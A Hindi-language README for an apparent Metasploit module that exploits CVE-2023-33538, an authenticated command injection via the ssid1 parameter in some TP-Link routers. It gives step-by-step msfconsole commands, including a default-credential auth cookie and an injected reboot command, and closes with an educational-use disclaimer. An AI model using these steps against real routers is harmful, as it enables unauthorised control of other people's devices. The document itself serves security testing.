
CVE-2023-33538 - TP-Link कमांड इंजेक्शन Ruby मॉड्यूल Metasploit Framework के लिए
यह Metasploit सहायक मॉड्यूल TP-Link TL-WR940N V2/V4 और TL-WR841N V8/V10 राउटर्स में एक प्रमाणित कमांड इंजेक्शन भेद्यता को लक्षित करता है।
समस्या WlanNetworkRpm.htm में उपयोग किए जाने वाले कमजोर ssid1 पैरामीटर में है, जो मनमाने शेल कमांड्स के इंजेक्शन की अनुमति देता है।
सफल होने पर, यह हमलावर को डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
CVE के बारे में अधिक जानकारी:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb फ़ाइल को अपने Metasploit मॉड्यूल फ़ोल्डर में कॉपी करें, उदाहरण के लिए:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
यह मॉड्यूल प्रमाणीकरण नहीं करता है। आपको राउटर के वेब इंटरफ़ेस में सफल लॉगिन से
Authorizationकुकी और सत्र उपसर्ग मैन्युअल रूप से निकालना होगा।
यह मॉड्यूल केवल शैक्षिक उद्देश्यों के लिए है।
इस कोड का उपयोग उन उपकरणों या बुनियादी ढांचे के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
यदि आपको बग मिलते हैं, या सुधार के विचार हैं – तो बेझिझक एक issue खोलें या टिप्पणी छोड़ें।